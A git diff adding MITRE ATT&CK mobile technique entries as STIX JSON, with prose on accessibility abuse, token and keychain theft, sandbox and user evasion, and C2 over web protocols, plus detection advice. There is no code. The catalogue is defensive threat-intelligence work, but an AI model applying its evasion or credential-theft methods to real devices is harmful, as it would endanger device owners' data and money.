"Skycure-Accessibility" + }, + { + "description": "Luk\u00e1\u0161 \u0160tefanko. (2018, December 11). Android Trojan steals money from PayPal accounts even with 2FA on. Retrieved July 11, 2019.", + "url": "https://www.welivesecurity.com/2018/12/11/android-trojan-steals-money-paypal-accounts-2fa/", + "source_name": "android-trojan-steals-paypal-2fa" + }, + { + "source_name": "banking-trojans-google-play", + "url": "https://www.welivesecurity.com/2018/10/24/banking-trojans-continue-surface-google-play/", + "description": "Luk\u00e1\u0161 \u0160tefanko. (2018, October 24). Banking Trojans continue to surface on Google Play. Retrieved July 11, 2019." + } + ], + "modified": "2020-03-30T14:03:43.761Z", + "name": "Abuse Accessibility Features", + "description": "**This technique has been deprecated. Please use [Input Capture](https://attack.mitre.org/techniques/T1417), [Input Injection](https://attack.mitre.org/techniques/T1516), and [Input Prompt](https://attack.mitre.org/techniques/T1411) where appropriate.**\n\nA malicious app could abuse Android's accessibility features to capture sensitive data or perform other malicious actions.(Citation: Skycure-Accessibility)\n\nAdversaries may abuse accessibility features on Android to emulate a user's clicks, for example to steal money from a user's bank account.(Citation: android-trojan-steals-paypal-2fa)(Citation: banking-trojans-google-play)\n\nAdversaries may abuse accessibility features on Android devices to evade defenses by repeatedly clicking the \"Back\" button when a targeted app manager or mobile security app is launched, or when strings suggesting uninstallation are detected in the foreground. This effectively prevents the malicious application from being uninstalled.(Citation: android-trojan-steals-paypal-2fa)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "credential-access" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "impact" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_deprecated": true, + "x_mitre_version": "2.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--22379609-a99f-4a01-bd7e-70f3e105859d.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--22379609-a99f-4a01-bd7e-70f3e105859d.json new file mode 100644 index 0000000000000000000000000000000000000000..f13a1b8b97e3663f9bd319e0989ee9180ccedc14 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--22379609-a99f-4a01-bd7e-70f3e105859d.json @@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--a84f6236-d4b3-4c88-a18a-c64a1d57df4b", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T18:51:07.651Z", + "name": "Exploitation of Remote Services", + "description": "Adversaries may exploit remote services of enterprise servers, workstations, or other resources to gain unauthorized access to internal systems once inside of a network. Adversaries may exploit remote services by taking advantage of a mobile device\u2019s access to an internal enterprise network through local connectivity or through a Virtual Private Network (VPN). Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system. \n\nAn adversary may need to determine if the remote system is in a vulnerable state, which may be done through [Network Service Scanning](https://attack.mitre.org/techniques/T1423) or other Discovery methods. These look for common, vulnerable software that may be deployed in the network, the lack of certain patches that may indicate vulnerabilities, or security software that may be used to detect or contain remote exploitation. Servers are likely a high value target for lateral movement exploitation, but endpoint systems may also be at risk if they provide an advantage or access to additional resources.\n\nDepending on the permissions level of the vulnerable remote service, an adversary may achieve [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1404) as a result of lateral movement exploitation as well. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "lateral-movement" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Detecting software exploitation initiated by a mobile device may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash.\n\nNetwork traffic analysis could reveal patterns of compromise if devices attempt to access unusual targets or resources. \n\nApplication vetting may be able to identify applications that perform Discovery or utilize existing connectivity to remotely access hosts within an internal enterprise network. ", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.2", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--22379609-a99f-4a01-bd7e-70f3e105859d", + "created": "2017-10-25T14:48:13.259Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1428", + "external_id": "T1428" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-32.html", + "external_id": "APP-32" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add.json new file mode 100644 index 0000000000000000000000000000000000000000..95e8e60586e636d02c3e4ad3afe9ee75f21db095 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add.json @@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--4ccbcc03-cd6f-4f9f-9509-0ac44b46efbf", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "created": "2022-04-01T19:06:27.177Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1437.001", + "url": "https://attack.mitre.org/techniques/T1437/001" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-29.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-29" + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may communicate using application layer protocols associated with web protocols traffic to avoid detection/network filtering by blending in with existing traffic. Commands to remote mobile devices, and often the results of those commands, will be embedded within the protocol traffic between the mobile client and server. \n\nWeb protocols such as HTTP and HTTPS are used for web traffic as well as well as notification services native to mobile messaging services such as Google Cloud Messaging (GCM) and newly, Firebase Cloud Messaging (FCM), (GCM/FCM: two-way communication) and Apple Push Notification Service (APNS; one-way server-to-device). Such notification services leverage HTTP/S via the respective API and are commonly abused on Android and iOS respectively in order blend in with routine device traffic making it difficult for enterprises to inspect. ", + "modified": "2022-04-06T13:07:45.661Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Web Protocols", + "x_mitre_detection": "Abuse of standard application protocols can be difficult to detect as many legitimate mobile applications leverage such protocols for language-specific APIs. Enterprises may be better served focusing on detection at other stages of adversarial behavior. ", + "kill_chain_phases": [ + { + "phase_name": "command-and-control", + "kill_chain_name": "mitre-mobile-attack" + } + ], + "x_mitre_is_subtechnique": true, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--233fe2c0-cb41-4765-b454-e0087597fbce.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--233fe2c0-cb41-4765-b454-e0087597fbce.json new file mode 100644 index 0000000000000000000000000000000000000000..926c803bade857d2755028951d930a9108fc274b --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--233fe2c0-cb41-4765-b454-e0087597fbce.json @@ -0,0 +1,74 @@ +{ + "type": "bundle", + "id": "bundle--5bd5f78a-ca97-4f0c-ae12-875e27df8883", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T18:53:52.292Z", + "name": "Steal Application Access Token", + "description": "Adversaries can steal user application access tokens as a means of acquiring credentials to access remote systems and resources. This can occur through social engineering or URI hijacking and typically requires user action to grant access, such as through a system \u201cOpen With\u201d dialogue. \n\nApplication access tokens are used to make authorized API requests on behalf of a user and are commonly used as a way to access resources in cloud-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) OAuth is one commonly implemented framework used to issue tokens to users for access to systems. An application desiring access to cloud-based services or protected APIs can gain entry through OAuth 2.0 using a variety of authorization protocols. An example of a commonly-used sequence is Microsoft's Authorization Code Grant flow.(Citation: Microsoft Identity Platform Protocols May 2019)(Citation: Microsoft - OAuth Code Authorization flow - June 2019) An OAuth access token enables a third-party application to interact with resources containing user data in the ways requested without requiring user credentials.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "On Android, users may be presented with a popup to select the appropriate application to open a URI in. If the user sees an application they do not recognize, they can remove it. When vetting applications for potential security weaknesses, the vetting process could look for insecure use of Intents. Developers should be encouraged to use techniques to ensure that the intent can only be sent to an appropriate destination (e.g., use explicit rather than implicit intents, permission checking, checking of the destination app's signing certificate, or utilizing the App Links feature). For mobile applications using OAuth, encourage use of best practice.(Citation: IETF-OAuthNativeApps)(Citation: Android-AppLinks)", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--233fe2c0-cb41-4765-b454-e0087597fbce", + "created": "2022-04-01T15:12:50.740Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1635", + "external_id": "T1635" + }, + { + "source_name": "Android-AppLinks", + "description": "Android. (n.d.). Handling App Links. Retrieved December 21, 2016.", + "url": "https://developer.android.com/training/app-links/index.html" + }, + { + "source_name": "Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019", + "description": "Auth0. (n.d.). Why You Should Always Use Access Tokens to Secure APIs. Retrieved September 12, 2019.", + "url": "https://auth0.com/blog/why-should-use-accesstokens-to-secure-an-api/" + }, + { + "source_name": "Microsoft - OAuth Code Authorization flow - June 2019", + "description": "Microsoft. (n.d.). Microsoft identity platform and OAuth 2.0 authorization code flow. Retrieved September 12, 2019.", + "url": "https://docs.microsoft.com/en-us/azure/active-directory/develop/v2-oauth2-auth-code-flow" + }, + { + "source_name": "Microsoft Identity Platform Protocols May 2019", + "description": "Microsoft. (n.d.). Retrieved September 12, 2019.", + "url": "https://docs.microsoft.com/en-us/azure/active-directory/develop/active-directory-v2-protocols" + }, + { + "source_name": "IETF-OAuthNativeApps", + "description": "W. Denniss and J. Bradley. (2017, October). IETF RFC 8252: OAuth 2.0 for Native Apps. Retrieved November 30, 2018.", + "url": "https://tools.ietf.org/html/rfc8252" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--24a77e53-0751-46fc-b207-99378fb35c08.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--24a77e53-0751-46fc-b207-99378fb35c08.json new file mode 100644 index 0000000000000000000000000000000000000000..340e35ac733ac9d05ea651286965db1c44fabf06 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--24a77e53-0751-46fc-b207-99378fb35c08.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--9b5ba1f9-1270-4ac9-8daa-1862b7d7053e", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--24a77e53-0751-46fc-b207-99378fb35c08", + "created": "2022-04-11T20:05:56.069Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1628.002", + "url": "https://attack.mitre.org/techniques/T1628/002" + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may attempt to avoid detection by hiding malicious behavior from the user. By doing this, an adversary\u2019s modifications would most likely remain installed on the device for longer, allowing the adversary to continue to operate on that device. \n\nWhile there are many ways this can be accomplished, one method is by using the device\u2019s sensors. By utilizing the various motion sensors on a device, such as accelerometer or gyroscope, an application could detect that the device is being interacted with. That way, the application could continue to run while the device is not in use but cease operating while the user is using the device, hiding anything that would indicate malicious activity was ongoing. Accessing the sensors in this way does not require any permissions from the user, so it would be completely transparent.", + "modified": "2022-04-11T20:05:56.069Z", + "name": "User Evasion", + "x_mitre_detection": "Mobile security products may be able to detect some forms of user evasion. Otherwise, the act of hiding malicious activity could be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.", + "kill_chain_phases": [ + { + "phase_name": "defense-evasion", + "kill_chain_name": "mitre-mobile-attack" + } + ], + "x_mitre_is_subtechnique": true, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--27d18e87-8f32-4be1-b456-39b90454360f.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--27d18e87-8f32-4be1-b456-39b90454360f.json new file mode 100644 index 0000000000000000000000000000000000000000..c95255fbad745a6592f0c5cf1373a1655d54de10 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--27d18e87-8f32-4be1-b456-39b90454360f.json @@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--ba00f8d2-3017-4fdd-9692-f4f7125e12bd", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T18:37:57.884Z", + "name": "Virtualization/Sandbox Evasion", + "description": "Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors after checking for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware\u2019s behavior to disengage from the victim or conceal the core functions of the payload. They may also search for VME artifacts before dropping further payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1633) during automated discovery to shape follow-on behaviors. \n\nAdversaries may use several methods to accomplish [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1633) such as checking for system artifacts associated with analysis or virtualization. Adversaries may also check for legitimate user activity to help determine if it is in an analysis environment. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Application vetting services could look for applications attempting to get `android.os.SystemProperties` or `getprop` with the runtime `exec()` commands. This could indicate some level of sandbox evasion, as Google recommends against using system properties within applications.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--27d18e87-8f32-4be1-b456-39b90454360f", + "created": "2022-03-30T17:51:29.550Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1633", + "external_id": "T1633" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--27f483c6-6666-44fa-8532-ffd5fc7dab38.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--27f483c6-6666-44fa-8532-ffd5fc7dab38.json new file mode 100644 index 0000000000000000000000000000000000000000..32e2de12f823c5dca5abb9dbcf412afc9de64507 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--27f483c6-6666-44fa-8532-ffd5fc7dab38.json @@ -0,0 +1,63 @@ +{ + "type": "bundle", + "id": "bundle--de75876b-4b73-4371-a4ba-cecda03cd3c6", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--27f483c6-6666-44fa-8532-ffd5fc7dab38", + "created": "2020-06-24T17:33:49.778Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1579", + "url": "https://attack.mitre.org/techniques/T1579" + }, + { + "source_name": "Apple Keychain Services", + "url": "https://developer.apple.com/documentation/security/keychain_services", + "description": "Apple, Inc.. (n.d.). Keychain Services. Retrieved June 24, 2020." + }, + { + "source_name": "Elcomsoft Decrypt Keychain", + "url": "https://blog.elcomsoft.com/2018/12/six-ways-to-decrypt-iphone-passwords-from-the-keychain/", + "description": "V. Katalov. (2018, December 18). Six Ways to Decrypt iPhone Passwords from the Keychain. Retrieved June 24, 2020." + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/authentication-threats/AUT-11.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "AUT-11" + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "Adversaries may collect the keychain storage data from an iOS device to acquire credentials. Keychains are the built-in way for iOS to keep track of users' passwords and credentials for many services and features such as Wi-Fi passwords, websites, secure notes, certificates, private keys, and VPN credentials.\n\nOn the device, the keychain database is stored outside of application sandboxes to prevent unauthorized access to the raw data. Standard iOS APIs allow applications access to their own keychain contained within the database. By utilizing a privilege escalation exploit or existing root access, an adversary can access the entire encrypted database.(Citation: Apple Keychain Services)(Citation: Elcomsoft Decrypt Keychain)", + "modified": "2022-04-01T15:02:43.470Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Keychain", + "x_mitre_detection": "Mobile security products can potentially detect jailbroken devices and perform further actions as necessary.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--29e07491-8947-43a3-8d4e-9a787c45f3d3.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--29e07491-8947-43a3-8d4e-9a787c45f3d3.json new file mode 100644 index 0000000000000000000000000000000000000000..8b8cf2b554eda6eaf5f5702e5561996df812d548 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--29e07491-8947-43a3-8d4e-9a787c45f3d3.json @@ -0,0 +1,62 @@ +{ + "type": "bundle", + "id": "bundle--abcb1e01-57be-4f32-9606-363d67531173", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--29e07491-8947-43a3-8d4e-9a787c45f3d3", + "created": "2017-10-25T14:48:17.176Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1413", + "url": "https://attack.mitre.org/techniques/T1413" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-3.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-3" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-13.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-13" + } + ], + "x_mitre_deprecated": true, + "revoked": false, + "description": "On versions of Android prior to 4.1, an adversary may use a malicious application that holds the READ_LOGS permission to obtain private keys, passwords, other credentials, or other sensitive data stored in the device's system log. On Android 4.1 and later, an adversary would need to attempt to perform an operating system privilege escalation attack to be able to access the log.", + "modified": "2022-04-06T15:37:34.463Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Access Sensitive Data in Device Logs", + "x_mitre_detection": "", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--29f1f56c-7b7a-4c14-9e39-59577ea2743c.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--29f1f56c-7b7a-4c14-9e39-59577ea2743c.json new file mode 100644 index 0000000000000000000000000000000000000000..b952b334bd3e306af9c543ee957033246aebe299 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--29f1f56c-7b7a-4c14-9e39-59577ea2743c.json @@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--535102c6-cbaa-4c5f-97e8-1dafb004c46e", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T15:16:19.547Z", + "name": "Command and Scripting Interpreter", + "description": "Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, Android is a UNIX-like OS and includes a basic [Unix Shell](https://attack.mitre.org/techniques/T1623/001) that can be accessed via the Android Debug Bridge (ADB) or Java\u2019s `Runtime` package.\n\nAdversaries may abuse these technologies in various ways as a means of executing arbitrary commands. Commands and scripts can be embedded in [Initial Access](https://attack.mitre.org/tactics/TA0027) payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing C2. Adversaries may also execute commands through interactive terminals/shells. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "execution" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Command-line activities can potentially be detected through Mobile Threat Defense integrations with lower-level OS APIs. This could grant the MTD agents access to running processes and their parameters, potentially detecting unwanted or malicious shells.\n\nApplication vetting services could detect the invocations of methods that could be used to execute shell commands.(Citation: Samsung Knox Mobile Threat Defense)", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--29f1f56c-7b7a-4c14-9e39-59577ea2743c", + "created": "2022-03-30T13:40:37.259Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1623", + "external_id": "T1623" + }, + { + "source_name": "Samsung Knox Mobile Threat Defense", + "description": "Samsung Knox Partner Program. (n.d.). Knox for Mobile Threat Defense. Retrieved March 30, 2022.", + "url": "https://partner.samsungknox.com/mtd" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--2aa78dfd-cb6f-4c70-9408-137cfd96be49.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--2aa78dfd-cb6f-4c70-9408-137cfd96be49.json new file mode 100644 index 0000000000000000000000000000000000000000..d59860b3829f7eb9f20c31efdae40ffc6d99322a --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--2aa78dfd-cb6f-4c70-9408-137cfd96be49.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--a3fe9a28-0422-4602-b6eb-7b939d99848a", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T18:40:12.912Z", + "name": "Disable or Modify Tools", + "description": "Adversaries may disable security tools to avoid potential detection of their tools and activities. This can take the form of disabling security software, modifying SELinux configuration, or other methods to interfere with security tools scanning or reporting information. This is typically done by abusing device administrator permissions or using system exploits to gain root access to the device to modify protected system files.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Users can view a list of active device administrators in the device settings.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--2aa78dfd-cb6f-4c70-9408-137cfd96be49", + "created": "2022-04-01T18:51:13.963Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1629/003", + "external_id": "T1629.003" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--2bb20118-e6c0-41dc-a07c-283ea4dd0fb8.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--2bb20118-e6c0-41dc-a07c-283ea4dd0fb8.json new file mode 100644 index 0000000000000000000000000000000000000000..acc4635c22af2771a253264b919491073d24670d --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--2bb20118-e6c0-41dc-a07c-283ea4dd0fb8.json @@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--499d81c3-c10a-4402-9be2-5fc04bff5654", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T18:43:44.687Z", + "name": "Ingress Tool Transfer", + "description": "Adversaries may transfer tools or other files from an external system onto a compromised device to facilitate follow-on actions. Files may be copied from an external adversary-controlled system through the command and control channel or through alternate protocols with another tool such as FTP.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Application vetting services could look for connections to unknown domains or IP addresses. Application vetting services may indicate precisely what content was requested during application execution.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "2.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--2bb20118-e6c0-41dc-a07c-283ea4dd0fb8", + "created": "2020-01-21T15:27:30.182Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1544", + "external_id": "T1544" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git 